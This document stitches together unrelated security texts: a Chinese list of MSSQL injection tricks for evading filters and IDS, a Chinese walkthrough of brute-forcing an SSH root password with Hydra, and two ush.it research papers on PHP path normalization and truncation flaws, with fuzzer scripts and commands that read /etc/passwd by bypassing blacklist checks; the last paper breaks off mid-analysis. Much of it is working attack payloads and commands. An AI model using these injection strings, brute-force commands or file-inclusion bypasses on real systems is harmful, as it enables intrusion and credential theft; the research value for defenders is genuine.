2、通过空格绕过
如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如
or’ swords’ =‘swords’，由于mssql的松散性，我们可以把or ‘swords’ 之间的空格去掉，并不影响运行。

3、运用字符串判断代替
用经典的or 1=1判断绕过,如or ‘swords’ =’swords’，这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如 or ‘swords’ = N’ swords’ ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过
效果值得考证，但毕竟是一种方法。如or ‘swords’ =‘sw’ +’ ords’ ；EXEC(‘IN’ +’ SERT INTO ‘+’ …..’ )

6、通过LIKE绕过
以前怎么就没想到呢？如or’swords’ LIKE ‘sw’！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过
与上面的LIKE的思路差不多,如or ‘swords’ IN (‘swords’)

8、通过BETWEEN绕过
如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’

9、通过>或者< 绕过
or 'swords' > ‘sw’
or ‘swords’ < ‘tw’
or 1<3
……

10、运用注释语句绕过
用/**/代替空格，如：UNION /**/ Select /**/user，pwd，from tbluser
用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

http://www.80sec.org

1.先安装libssh.
[root@localhost ~]# tar -zxvf libssh-0.11.gz
[root@localhost ~]# cd libssh-0.11
[root@localhost ~]# ./configure
[root@localhost ~]# make
[root@localhost ~]# make install

2.到www.thc.org下载最新版hydra并安装

[root@localhost ~]# tar -zxvf hydra-5.4-src.tar.gz
[root@localhost ~]# cd hydra-5.4-src
[root@localhost ~]# ./configure
[root@localhost ~]# make
[root@localhost ~]# make install
[root@localhost ~]# ln -s /usr/local/include/libssh /usr/include/libssh
[root@localhost ~]# ln -s /usr/local/lib/libssh.so /lib/libssh.so

3.使用hydra破解ssh登录密码
[root@localhost ~]# hydra -l root -P ~/passwd.dic 192.168.1.112 ssh2 //使用-o file参数,可以记录日志
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-06-15 23:56:43
[DATA] 16 tasks, 1 servers, 106 login tries (l:1/p:106), ~6 tries per task
[DATA] attacking service ssh2 on port 22
[22][ssh2] host: 192.168.1.112 login: root password: xxxxxxxx
[STATUS] attack finished for 192.168.1.112 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2008-06-15 23:57:15
[root@localhost ~]#

===================================================================================================
[root@localhost ~]# hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC
语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

参数列表:

-R 恢复上次停止的破解进度，继续破解
-S 使用SSL连接
-s PORT if the service is on a different default port, define it here
-s 端口号 在这里自定义要破解的端口号(替代默认端口)
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-l 登录名 或者 -L 字典 使用登录名 或者 从字典中获取登录名单
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-p 密码 或者 -P 字典 使用单个密码 或者 从字典中获取密码列表
-e ns 附加选项,n 是表示空密码,s 尝试使用密码进行破解
-C FILE colon seperated “login:pass” format, instead of -L/-P options
-C 文件 使用冒号分割格式 例如 “登录名:密码”来代替-L/-P参数
-M FILE server list for parallel attacks, one entry per line
-M 文件 服务器列表(译者:ip列表),一行一条
-o FILE write found login/password pairs to FILE instead of stdout
-o 文件 将找到的密码写在文件里面 以此代替输出到屏幕上
-f 在使用-M参数以后 找到第一对登录名或者密码的时候中止破解
-t TASKS run TASKS number of connects in parallel (default: 16)
-t 计划任务 同时运行几个任务(默认是: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-w 时间 定义超时时间秒数(默认是: 30)
-v / -V 详细显示用户名或者密码的破解过程
server the target server (use either this OR the -M option)
服务器 服务器目标(译者：就是你要破解密码的主机) (你也可以使用-M参数指定)
service the service to crack. Supported protocols:
[telnet ftp pop3 imap smb smbnt http httpshttp-proxy cisco cisco-enable ldap
mssql mysql nntp vnc socks5 rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth]
OPT some service modules need special input (see README!)
OPT 一些服务模块需要特别的语法输入(详细请看5.特别参数模块)

两个例子:
hydra -l login -P /tmp/passlist 192.168.0.1 ftp
login为要破解的用户名，passlist为密码字典库

hydra -l login -P passfile 192.168.0.1 smb
login为要破解的登录名，passfile为密码字典库，smb操作系统登录密码破解

I) Introduction
II) PHP arbitrary Local File Inclusion testing
III) PHP arbitrary Local File Inclusion results
IV) PHP arbitrary File Open testing
V) PHP arbitrary File Open results
VI) PHP arbitrary Remote File Upload testing
VII) PHP arbitrary Remote File Upload results
VIII) Conclusions
IX) References

I) Introduction

This is the second part and continuation of our previous “PHP filesystem
attack vectors” [1] research.

Working with s4tan and ascii on the “SugarCRM 5.2.0e Remote Code
Execution” advisory [2] we noticed a strange behaviour on Windows OS:
trying to upload a file named “a.php.” results in just “a.php”.

Analyzing this we noticed that every time an application, or manually,
was trying to open or save a file with one ore more dots at the end,
Windows was not denying the operation, but it was removing the dots in a
transparent way.

Mindful readers probably have already spotted the issue.

We wanted to take our time for a deeper investigation about what
normalization issues were available and how to take advantage of them
in order to exploit arbitrary local file inclusion/handling and uploads
functionalities (not only on Windows OS but also on GNU/Linux and *BSD).

Below you can find the sources of two simple “academic” fuzzers, later
results are discussed and finally POCs and conclusions are proposed.

II) PHP arbitrary Local File Inclusion testing

This tests include(), include_once(), require(), require_once() and
similiar functions.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

alfi_fuzzer.php:

error_reporting(0);

$InterestingFile = "test_alfi.php";
$fh = @fopen($InterestingFile, 'w+');
fwrite($fh, "“);
fclose($fh);

for ($i = 1; $i < 256; $i++) {
$chri = chr($i);
for ($j = 0; $j < 256; $j++) {
$chrj = chr($j);
for ($k = 0; $k < 256; $k++) {
$chrk = chr($k);
if($chri.$chrj.$chrk == '://') continue;
if ($j == 0) $FuzzyFile = $InterestingFile.$chri;
else if ($k == 0) $FuzzyFile = $InterestingFile.$chri.$chrj;
else $FuzzyFile = $InterestingFile.$chri.$chrj.$chrk;
if(include($FuzzyFile)) {
print($i." ".$j." ".$k." [".$FuzzyFile."]\n");
fclose($fh);
}
if($j == 0) break;
}
}
}

unlink($InterestingFile);

?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Note: This code and the one that will be presented in section IV only
makes use of chars from the ASCII extended table (256 chars) to limit the
combinations because our intent was to test not only a malicious ending
char but a whole ending "extension" of 3 bytes.

A better fuzzer would include UTF-8. In the test we also do not
consider \x00, because this vector is already known [3, 4].

III) PHP arbitrary Local File Inclusion results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ php alfi_fuzzer.php
47 46 46 [test_alfi.php/.]
47 47 47 [test_alfi.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ php alfi_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ php alfi_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

C:\PHPFS_MAD2> php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 (“), \x2E (.), \x3C (< ), \x3E (>)
! Valid strings are all combinations of the above chars.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

C:\PHPFS_MAD2> php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 (“), \x2E (.), \x3C (< ), \x3E (>)
! Valid strings are all combinations of the above chars.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

IV) PHP arbitrary File Open testing

This tests fopen() and similiar functions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

afo_fuzzer.php:

error_reporting(0);

$MaliciousFile = "test_afo.php";

for ($i = 1; $i < 256; $i++) {
$chri = chr($i);
for ($j = 0; $j < 256; $j++) {
$chrj = chr($j);
for ($k = 0; $k < 256; $k++) {
if ($j == 0) $FuzzyFile = $MaliciousFile.$chri;
else if ($k == 0) $FuzzyFile = $MaliciousFile.$chri.$chrj;
else $FuzzyFile = $MaliciousFile.$chri.$chrj.chr($k);
$fh = @fopen($FuzzyFile, 'w+');
if ($fh != FALSE) {
fwrite($fh, $FuzzyFile);
fclose($fh);
if (file_exists($MaliciousFile)) {
if ($j == 0) print($i." ");
else if ($k == 0) print($i." ".$j." ");
else $FuzzyFile = print($i." ".$j." ".$k." ");
print("[".file_get_contents($MaliciousFile)."]\n");
unlink($MaliciousFile);
} else
unlink($FuzzyFile);
}
if($j == 0)
break;
}
}
}

?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

V) PHP arbitrary File Open Fuzzer results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ php afo_fuzzer.php
47 46 [test_afo.php/.]
47 47 46 [test_afo.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ php afo_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ php afo_fuzzer.php

47 46 [test_afo.php/.]
47 47 46 [test_afo.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

C:\PHPFS_MAD2> php afo_fuzzer.php

! Valid chars are: \x2E (.), \x2F (/), \x5C (\)
! Valid strings are all combinations of the above chars.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

C:\PHPFS_MAD2> php afo_fuzzer.php

! Valid chars are: \x2E (.), \x2F (/), \x5C (\)
! Valid strings are all combinations of the above chars.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VI) PHP arbitrary Remote File Upload testing

This tests move_uploaded_file() and similiar functions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

upload.php:

error_reporting(0);

$MaliciousFile = "evil.php";

if (isset($_GET['fuzzy'])) {
$FuzzyDestination = $MaliciousFile.$_GET['fuzzy'];
move_uploaded_file($_FILES['userfile']['tmp_name'], $FuzzyDestination);
printf($FuzzyDestination);
if (file_exists($MaliciousFile)) {
echo "SUCCESS";
unlink($MaliciousFile);
exit();
} else {
unlink($FuzzyDestination);
}
}

echo "FAIL";

?>

arfu_fuzzer.sh:

#!/bin/bash

touch “uploadtest.txt”
url=”http://127.0.0.1/uploads/upload.php?fuzzy=”

for i in {1..255}; do
xi=”%`printf %02x $i`”
for j in {0..255}; do
xj=”%`printf %02x $j`”
for k in {0..255}; do
xk=”%`printf %02x $k`”

ext=”$xi$xj$xk”
[ $k -eq 0 ] && ext=”$xi$xj”
[ $k -eq 0 ] && [ $j -eq 0 ] && ext=”$xi”

response=`curl -kis -F “userfile=@uploadtest.txt;” $url$ext | grep \
SUCCESS | wc -l`

if [ "$response" == "1" ]; then
echo “Found: $i $j $k -> ($ext)”;
fi

[ $j -eq 0 ] && break

done
done
done

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VII) PHP arbitrary Remote File Upload results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 0 0 -> (/)
FOUND: 47 46 0 -> (/.)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 0 0 -> (/)
FOUND: 47 46 0 -> (/.)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 46 0 -> (/.)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

PHPFS_MAD2 $ sh test_arfu.sh

[ All the combinations of (space), ., /, \ are valid ones. ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

PHPFS_MAD2 $ sh test_arfu.sh

[ All the combinations of (space), ., /, \ are valid ones. ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VIII) Conclusions

We found that it's possible to take advantage of filename normalization
routines in order to bypass common web application security routines,
detailed below:

- On GNU/Linux both (include|require)(_once)? functions will convert
"foo.php" followed by one or more sequences of \x2F (/) and \x2E (.)
back to "foo.php".
This does not work if Suhosin patch is applied.

- On GNU/Linux the fopen function will convert "foo.php" followed by one
or more sequences of \x2F (/) and \x2E (.) back to "foo.php".
This does not work if Suhosin patch is applied.

- On GNU/Linux move_uploaded_file function will convert "foo.php"
followed by one or more sequences of \x2F (/) and \x2E (.) back to
"foo.php".
This does work anyway *also* if Suhosin patch is applied.

- On FreeBSD the fopen function will convert "foo.php" followed by one
or more sequences of \x2F (/) and \x2E (.) back to "foo.php".
This does work anyway *also* if Suhosin patch is applied.
Suhosin is shipped in the the default install.

- On FreeBSD the move_uploaded_file function will convert "foo.php"
followed by one or more sequences of \x2F (/) and \x2E (.) back to
"foo.php".
This does work anyway *also* if Suhosin patch is applied.
Suhosin is shipped in the the default install.

- On Windows OS both (include|require)(_once)? functions will convert
"foo.php" followed by one or more of the chars \x20 ( ), \x22 ("),
\x2E (.), \x3C (<), \x3E (>) back to “foo.php”.

- On Windows OS the fopen function will convert “foo.php” followed by
one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to
“foo.php”.

- On Windows OS move_uploaded_file function will convert “foo.php”
followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
back to “foo.php”.

We have observed that some particular strings like “foo.php./” or
“foo.php.\” force Windows to create a file called “foo.php.”. It
seems that Windows’ functions do not contemplate the existence of
a file with dots at the end (perhaps Windows hackers can better
comment on this).

All functions on that file will fail their attempt, so that it’s not
possible to easily delete or rename that file (one has to do del *
or similiar).

IX) References

[1] http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt

[2] http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
[3] http://www.securiteam.com/securitynews/5FP0C0KJPQ.html
[4] http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

Credits (Out of band)

This article has been bought to you by the ush.it team. Giovanni
“evilaliv3″ Pellerano, Antonio “s4tan” Parata and Francesco “ascii”
Ongaro are the ones who spent most hours on it with the precious help
of Alessandro “Jekil” Tanasi, Florin “Slippery” Iamandi and many other
friends.

Giovanni “evilaliv3″ Pellerano
web site: http://www.ush.it/, http://www.evilaliv3.org/
mail: evilaliv3 AT ush DOT it

Antonio “s4tan” Parata
web site: http://www.ush.it/
mail: s4tan AT ush DOT it

Francesco “ascii” Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

Alessandro “jekil” Tanasi
web site: http://www.tanasi.it/
mail: alessandro AT tanasi DOT it

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

Legal Notices

Copyright (c) 2009 Francesco “ascii” Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the article is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

# milw0rm.com [2009-07-28]

I) Introduction
II) The bugs in 50 words
III) PHP filesystem functions path normalization attack
IV) PHP filesystem functions path normalization attack details
V) PHP filesystem functions path truncation attack
VI) PHP filesystem functions path truncation attack details
VII) The facts
VIII) POC and attack code
IX) Conclusions
X) References

I) Introduction

On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some
time before that was a new attack vector for filesystem functions (fopen,
(include|require)[_once]?, file_(put|get)_contents, etc) for the PHP
language. It was a path normalization issue and I asked them to keep it
“secret” [4], this was a good idea cause my analisys was mostly
incomplete and erroneous but the idea was good and the bug was real and
disposable.

Later on Dec 24, 2008 on sla.ckers.org barbarianbob showed a path
truncation attack against PHP that is partially based on mine attack.
He discovered the bugs indipendently so he deserves full credits for
them and his findings were dissected partially by Pragmatk on [2] and
[3]. Sadly, or luckily, only the surface of these important issues has
been analyzed and that’s why we at ush.it are releasing this article:
to bring complete light on them and present some additional juice.

II) The bugs in 50 words

As previously indicated there are two different bugs, the first, the one
that I discovered on April 2008 that can be used independently for some
purposes and the second one, discovered by barbarianbob that uses the
first one to archieve a better goal.

Let’s see the details.

- PHP filesystem functions path normalization attack

PHP normalizes / and /. in path names allowing for example
/etc/passwd/ or /etc/passwd/. to be succesfully opened as a file.

- PHP filesystem functions path truncation attack

PHP has a path truncation issue (a badly implemented snprintf())
allowing only MAX_PATH chars to be evaluated when actually opening a
file or directory.

III) PHP filesystem functions path normalization attack

Normally one would expect that to open a file its path must be issued
correctly:

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'include("/etc/passwd");' | head -n1
root:x:0:0:root:/root:/bin/bash

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

While all of us are aware that some path normalizations are normal:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ cat /etc//passwd | head -n1
root:x:0:0:root:/root:/bin/bash
$ cat /etc/./passwd | head -n1
root:x:0:0:root:/root:/bin/bash

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP does far more than what we are likely to expect:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

php -r 'include("/etc/passwd/");'

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see the file is succesfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similiar functions).

This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.

But with vanilla PHP (the official source tree) it will not work and
you'll get an error complaining about the fact that the target is not
a directory. Why? Because barbarianbob, everybody who ran it succesfully,
and me in my initial disclosure [4] were using a patched PHP (for example
Suhosin, both loaded as .so or "build-in", Ubuntu PHP, that is patched
with Suhosin, etc).

This is thanks to a deep and extensive testing and observation plus some
code navigation and gdb magery with the help of evilaliv3 and Wisec.

To overcome this limitation we came out with the universal path
normalization vector for PHP that is not a single "/" but "/.". Well
this is the case in which a single char really changes things.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

php -r 'include("/etc/passwd/.");'

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This doesn't happen under normal circumstances.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ cat /etc/passwd/.
cat: /etc/passwd/.: Not a directory

$ cat /etc/passwd/
cat: /etc/passwd/: Not a directory

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We were already aware of the fact that these "neutral" chars could be
repeated many times without affecting the result.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

php -r 'include("/etc/passwd//////");'
php -r 'include("/etc/passwd/./././././.");'

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

To be perfectly clear I was not aware of the path truncation issue
(damn!) and the use for this vulnerability was different in my mind.

If you read the discussion in [4] it was about checks. While ereg*()
functions can be poisoned by nullbytes, preg_*() and string functions
like substr() are binary safe.

So if there is a "blacklist" or negative check you can bypass it with
path normalization:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/passwd' |
head -n1
(doesn't work as expected)

$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc//passwd'
| head -n1
root:x:0:0:root:/root:/bin/bash

$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc///passwd'
| head -n1
root:x:0:0:root:/root:/bin/bash

$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/./passwd'
| head -n1
root:x:0:0:root:/root:/bin/bash

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

But path normalization on PHP allows you to do something that cat(1)
can't. To explain this a better example is needed, first let's see
what would happen if only "classic" path normalization was possible:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);'
'/etc/passwd' | head -n1
(doesn't work as expected)

$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);'
'/etc//passwd' | head -n1
(doesn't work as expected, cause it still ends in passwd)

$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);'
'/etc/./passwd' | head -n1
(doesn't work as expected, cause it still ends in passwd)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

A check like this can't be directly bypassed (it could be if the
attacker was able to create a link to /etc/passwd for example) but the
need of this level of access becomes useless using the trailing "/"
or "/." attack vector that we are presenting:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);'
'/etc/passwd/.' | head -n1
root:x:0:0:root:/root:/bin/bash <- WORKS!

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Now that the usefulness of this path normalization issue, specific to
PHP, is clear, it's time for a more concrete example: bypassing
blacklist file extension checking.

The case is of a code equivalent to the following (for example an online
file editor script).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.txt'
ciccio.txt

$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php'
(doesn't work as expected because the extension is blacklisted)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead, using our attack vector, the check is bypassed (and the filesystem
function will normalize the path in a way that the attack will succeed):

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php/'
ciccio.php/

$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php/.'
ciccio.php/.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Thanks to the discussion with kuza55, evilaliv3 and Wisec, 3 main uses
of this attack vector were identified:

- Blacklist bypass on write functions (file editors, file writing, etc)
- Blacklist bypass on read functions (source disclosure, etc)
- Regular expressions and IDS/IPS signature evasion

The wrong assumption was that this behaviour was filesystem dependent,
as said it turned out to be dependent on witch PHP version (patched VS
non-patched) was installed.

Kuza55 also remembered that blacklist based editors and uploads can be
evaded anyway by uploading ".php.xyz" files (thanks to the Apache
mod_mime mapping feature [6] necessary for mod_negotiation's Multiviews)
but that's another story.

IV) PHP filesystem functions path normalization attack details

>From first empirical tests we discovered that the universal path
normalization is “/.”, these tests were lately expanded with deeper
analysis of the PHP source code.

PHP defines some stream wrapper functions and makes them available for
use by higher level functions like include, require, require_once,
file_get_contents, fopen and others.

In this paper only include/require behaviours are going to be analyzed.

The code analysis started with a simple breakpoint on open calls:

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ gdb /usr/bin/php
(gdb) break open
Function "open" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (open) pending.
(gdb) r -r '@include("/etc/passwd/.");'
Starting program: /usr/bin/php -r '@include("/etc/passwd/.");'
[..]
[Switching to Thread 0xb7f2e6c0 (LWP 7264)]
Breakpoint 1, 0x41606820 in open () from /lib/libpthread.so.0
(gdb) bt
#0 0x41606820 in open () from /lib/libpthread.so.0
#1 0x082142c7 in _php_stream_fopen ()
#2 0xbff4c8cc in ?? ()
#3 0x09d20050 in ?? ()
#4 0x0000003b in ?? ()
#5 0x085e2504 in php_stream_stdio_ops ()
#6 0x00000000 in ?? ()

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

_php_stream_fopen(), defined in main/plain_wrapper.c, was a good
function to start the code analysis with as it was containing this
interesting code:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

streams/plain_wrapper.c-893: if ((realpath =
expand_filepath(filename, NULL TSRMLS_CC)) == NULL) {

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The attention was then directed to the expand_filepath() function,
defined in main/fopen_wrappers.c, and finally to expand_filepath_ex(),
defined in the same file, witch was also containing the snprintf cause
of the path truncation that will be discussed in the next chapter.

After some raw (eg: printf+gdb) debug of expand_filepath_ex() the
faulty function was finally identified: virtual_file_ex().

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

main/fopen_wrappers.c-656: if (virtual_file_ex(&new_state, filepath,
NULL, CWD_FILEPATH)) {
main/fopen_wrappers.c-657: free(new_state.cwd);
main/fopen_wrappers.c-658: return NULL;
main/fopen_wrappers.c-659: }

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Yeah! virtual_file_ex() is the faulty function!

It's defined at line 482 of SRM/tsrm_virtual_cwd.c

Let's see where the error is.

The interesting part of the function is at line 619 of
TSRM/tsrm_virtual_cwd.c

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

TSRM/tsrm_virtual_cwd.c-619: tok=NULL;
TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r(path_copy,
TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-621: while (ptr) {
TSRM/tsrm_virtual_cwd.c-622: ptr_length = strlen(ptr);
[..]
TSRM/tsrm_virtual_cwd.c-624: if (IS_DIRECTORY_UP(ptr, ptr_length)) {
[..]
TSRM/tsrm_virtual_cwd.c-651: } else if (!IS_DIRECTORY_CURRENT(ptr,
ptr_length)) {
[..]
TSRM/tsrm_virtual_cwd.c-717: }
TSRM/tsrm_virtual_cwd.c-718: ptr = tsrm_strtok_r(NULL,
TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-719: }

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

TOKENIZER_STRING, IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined
in other points in the source:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ grep "#define TOKENIZER" */* -n
